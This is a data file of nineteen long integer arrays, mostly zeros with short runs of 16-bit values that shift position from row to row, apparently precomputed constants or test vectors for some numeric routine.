[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 8324, 14145, 7398, 59910, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 48128, 20224, 56256, 13552, 1980, 11411],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 34692, 20033, 35302, 26374, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 25600, 30976, 1600, 8080, 19556, 50041, 7506],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 61060, 25921, 63206, 58374, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 59392, 14848, 24192, 17312, 32232, 29498, 10941],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 21892, 31809, 25574, 24838, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 48128, 20224, 11200, 23792, 30396, 45135, 38212],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 48260, 37697, 53478, 56838, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 18432, 53760, 25728, 15648, 584, 41495],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 9092, 43585, 15846, 23302, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 21504, 62720, 34112, 1872, 25684, 35829, 43558],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 35460, 49473, 43750, 55302, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 38912, 26112, 35200, 46688, 20632, 31846, 5409],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 61828, 55361, 6118, 21766, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 60160, 29376, 63152, 52012, 37867, 45176],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 22660, 61249, 34022, 53766, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 5120, 25856, 61760, 9808, 19732, 37467],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 49028, 1601, 61926, 20230, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 17408, 45312, 21568, 17168, 12612, 31153, 30906],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 9860, 7489, 24294, 52230, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 18432, 53760, 17536, 3360, 15432, 25554, 21573],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 36228, 13377, 52198, 18694, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 39936, 50944, 35264, 17520, 27804, 49863, 28524],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 62596, 19265, 14566, 50694, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 2048, 16896, 41088, 5152, 24927],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 23428, 25153, 42470, 17158, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 13312, 44288, 29504, 37584, 9012, 10413, 48398],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 49796, 31041, 4838, 49158, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 63488, 32256, 36736, 2016, 28920, 62846, 11305],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 10628, 36929, 32742, 15622, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 3072, 58112, 28864, 1584, 19212, 63715, 26144],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 36996, 42817, 60646, 47622, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 27648, 47872, 5824, 23472, 50028, 13091],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 63364, 48705, 23014, 14086, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 9216, 59648, 57920, 46736, 43556, 29929, 27426],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 24196, 54593, 50918, 46086, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 43008, 27136, 27264, 26272, 7848, 15722, 41165],
